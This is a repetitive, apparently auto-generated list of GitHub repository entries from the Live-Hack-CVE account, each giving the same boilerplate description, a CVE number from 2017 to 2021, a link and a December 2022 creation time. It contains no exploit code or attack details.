**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10285](https://github.com/Live-Hack-CVE/CVE-2017-10285) create time: 2022-12-24T19:13:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10281](https://github.com/Live-Hack-CVE/CVE-2017-10281) create time: 2022-12-24T19:13:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10349](https://github.com/Live-Hack-CVE/CVE-2017-10349) create time: 2022-12-24T19:13:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10295 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10295](https://github.com/Live-Hack-CVE/CVE-2017-10295) create time: 2022-12-24T19:13:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10348 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10348](https://github.com/Live-Hack-CVE/CVE-2017-10348) create time: 2022-12-24T19:13:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10198](https://github.com/Live-Hack-CVE/CVE-2017-10198) create time: 2022-12-24T19:12:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10176 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10176](https://github.com/Live-Hack-CVE/CVE-2017-10176) create time: 2022-12-24T19:12:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10193](https://github.com/Live-Hack-CVE/CVE-2017-10193) create time: 2022-12-24T19:12:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10118](https://github.com/Live-Hack-CVE/CVE-2017-10118) create time: 2022-12-24T19:12:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10135](https://github.com/Live-Hack-CVE/CVE-2017-10135) create time: 2022-12-24T19:12:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10116](https://github.com/Live-Hack-CVE/CVE-2017-10116) create time: 2022-12-24T18:42:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10111 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10111](https://github.com/Live-Hack-CVE/CVE-2017-10111) create time: 2022-12-24T18:42:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10109](https://github.com/Live-Hack-CVE/CVE-2017-10109) create time: 2022-12-24T18:42:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10101](https://github.com/Live-Hack-CVE/CVE-2017-10101) create time: 2022-12-24T18:42:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10107 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10107](https://github.com/Live-Hack-CVE/CVE-2017-10107) create time: 2022-12-24T18:42:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10108 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10108](https://github.com/Live-Hack-CVE/CVE-2017-10108) create time: 2022-12-24T18:42:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10102 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10102](https://github.com/Live-Hack-CVE/CVE-2017-10102) create time: 2022-12-24T18:42:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10090 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10090](https://github.com/Live-Hack-CVE/CVE-2017-10090) create time: 2022-12-24T18:41:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10096](https://github.com/Live-Hack-CVE/CVE-2017-10096) create time: 2022-12-24T18:41:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10087](https://github.com/Live-Hack-CVE/CVE-2017-10087) create time: 2022-12-24T18:41:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2942](https://github.com/Live-Hack-CVE/CVE-2018-2942) create time: 2022-12-24T19:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2952 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2952](https://github.com/Live-Hack-CVE/CVE-2018-2952) create time: 2022-12-24T19:14:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2783](https://github.com/Live-Hack-CVE/CVE-2018-2783) create time: 2022-12-24T19:14:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2799](https://github.com/Live-Hack-CVE/CVE-2018-2799) create time: 2022-12-24T19:14:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2940 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2940](https://github.com/Live-Hack-CVE/CVE-2018-2940) create time: 2022-12-24T19:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-5786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-5786](https://github.com/Live-Hack-CVE/CVE-2018-5786) create time: 2022-12-24T18:35:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13096](https://github.com/Live-Hack-CVE/CVE-2018-13096) create time: 2022-12-24T18:33:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13099](https://github.com/Live-Hack-CVE/CVE-2018-13099) create time: 2022-12-24T18:33:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17825](https://github.com/Live-Hack-CVE/CVE-2018-17825) create time: 2022-12-24T18:33:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16877 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16877](https://github.com/Live-Hack-CVE/CVE-2018-16877) create time: 2022-12-24T18:33:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16878 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16878](https://github.com/Live-Hack-CVE/CVE-2018-16878) create time: 2022-12-24T18:33:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-15822 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-15822](https://github.com/Live-Hack-CVE/CVE-2018-15822) create time: 2022-12-24T18:33:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7557](https://github.com/Live-Hack-CVE/CVE-2018-7557) create time: 2022-12-24T18:33:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17773 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17773](https://github.com/Live-Hack-CVE/CVE-2018-17773) create time: 2022-12-24T18:33:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-5332 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-5332](https://github.com/Live-Hack-CVE/CVE-2018-5332) create time: 2022-12-24T18:33:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17565](https://github.com/Live-Hack-CVE/CVE-2019-17565) create time: 2022-12-24T18:40:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17559](https://github.com/Live-Hack-CVE/CVE-2019-17559) create time: 2022-12-24T18:40:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13164](https://github.com/Live-Hack-CVE/CVE-2019-13164) create time: 2022-12-24T18:40:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14734 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14734](https://github.com/Live-Hack-CVE/CVE-2019-14734) create time: 2022-12-24T18:40:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14690](https://github.com/Live-Hack-CVE/CVE-2019-14690) create time: 2022-12-24T18:39:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14691](https://github.com/Live-Hack-CVE/CVE-2019-14691) create time: 2022-12-24T18:39:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1020014 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1020014](https://github.com/Live-Hack-CVE/CVE-2019-1020014) create time: 2022-12-24T18:39:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15151 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15151](https://github.com/Live-Hack-CVE/CVE-2019-15151) create time: 2022-12-24T18:39:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20803](https://github.com/Live-Hack-CVE/CVE-2019-20803) create time: 2022-12-24T18:37:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20804](https://github.com/Live-Hack-CVE/CVE-2019-20804) create time: 2022-12-24T18:37:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5319 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5319](https://github.com/Live-Hack-CVE/CVE-2019-5319) create time: 2022-12-24T18:35:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3865](https://github.com/Live-Hack-CVE/CVE-2019-3865) create time: 2022-12-24T18:35:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17052](https://github.com/Live-Hack-CVE/CVE-2019-17052) create time: 2022-12-24T18:34:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16223](https://github.com/Live-Hack-CVE/CVE-2019-16223) create time: 2022-12-24T18:34:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9721 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9721](https://github.com/Live-Hack-CVE/CVE-2019-9721) create time: 2022-12-24T18:33:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9718 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9718](https://github.com/Live-Hack-CVE/CVE-2019-9718) create time: 2022-12-24T18:32:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13549 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13549](https://github.com/Live-Hack-CVE/CVE-2020-13549) create time: 2022-12-24T19:13:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16211 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16211](https://github.com/Live-Hack-CVE/CVE-2020-16211) create time: 2022-12-24T18:41:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27841](https://github.com/Live-Hack-CVE/CVE-2020-27841) create time: 2022-12-24T18:41:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27845](https://github.com/Live-Hack-CVE/CVE-2020-27845) create time: 2022-12-24T18:41:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16213](https://github.com/Live-Hack-CVE/CVE-2020-16213) create time: 2022-12-24T18:41:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7479](https://github.com/Live-Hack-CVE/CVE-2020-7479) create time: 2022-12-24T18:40:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26990](https://github.com/Live-Hack-CVE/CVE-2020-26990) create time: 2022-12-24T18:40:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26991 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26991](https://github.com/Live-Hack-CVE/CVE-2020-26991) create time: 2022-12-24T18:40:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9520](https://github.com/Live-Hack-CVE/CVE-2020-9520) create time: 2022-12-24T18:40:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9549 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9549](https://github.com/Live-Hack-CVE/CVE-2020-9549) create time: 2022-12-24T18:40:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6432](https://github.com/Live-Hack-CVE/CVE-2020-6432) create time: 2022-12-24T18:39:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6431 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6431](https://github.com/Live-Hack-CVE/CVE-2020-6431) create time: 2022-12-24T18:39:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6802](https://github.com/Live-Hack-CVE/CVE-2020-6802) create time: 2022-12-24T18:39:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10385](https://github.com/Live-Hack-CVE/CVE-2020-10385) create time: 2022-12-24T18:39:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1944](https://github.com/Live-Hack-CVE/CVE-2020-1944) create time: 2022-12-24T18:38:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6435 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6435](https://github.com/Live-Hack-CVE/CVE-2020-6435) create time: 2022-12-24T18:38:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6439 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6439](https://github.com/Live-Hack-CVE/CVE-2020-6439) create time: 2022-12-24T18:38:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6433](https://github.com/Live-Hack-CVE/CVE-2020-6433) create time: 2022-12-24T18:38:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6440 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6440](https://github.com/Live-Hack-CVE/CVE-2020-6440) create time: 2022-12-24T18:38:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6437](https://github.com/Live-Hack-CVE/CVE-2020-6437) create time: 2022-12-24T18:38:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6816](https://github.com/Live-Hack-CVE/CVE-2020-6816) create time: 2022-12-24T18:38:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11100 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11100](https://github.com/Live-Hack-CVE/CVE-2020-11100) create time: 2022-12-24T18:38:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10977 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10977](https://github.com/Live-Hack-CVE/CVE-2020-10977) create time: 2022-12-24T18:37:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11863](https://github.com/Live-Hack-CVE/CVE-2020-11863) create time: 2022-12-24T18:37:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16217](https://github.com/Live-Hack-CVE/CVE-2020-16217) create time: 2022-12-24T18:37:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16229](https://github.com/Live-Hack-CVE/CVE-2020-16229) create time: 2022-12-24T18:37:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9371 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9371](https://github.com/Live-Hack-CVE/CVE-2020-9371) create time: 2022-12-24T18:37:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9364 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9364](https://github.com/Live-Hack-CVE/CVE-2020-9364) create time: 2022-12-24T18:37:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9289 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9289](https://github.com/Live-Hack-CVE/CVE-2020-9289) create time: 2022-12-24T18:37:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8895](https://github.com/Live-Hack-CVE/CVE-2020-8895) create time: 2022-12-24T18:37:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45960 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45960](https://github.com/Live-Hack-CVE/CVE-2021-45960) create time: 2022-12-24T18:41:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46143 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46143](https://github.com/Live-Hack-CVE/CVE-2021-46143) create time: 2022-12-24T18:41:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39909 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39909](https://github.com/Live-Hack-CVE/CVE-2021-39909) create time: 2022-12-24T18:40:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39883 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39883](https://github.com/Live-Hack-CVE/CVE-2021-39883) create time: 2022-12-24T18:39:55Z

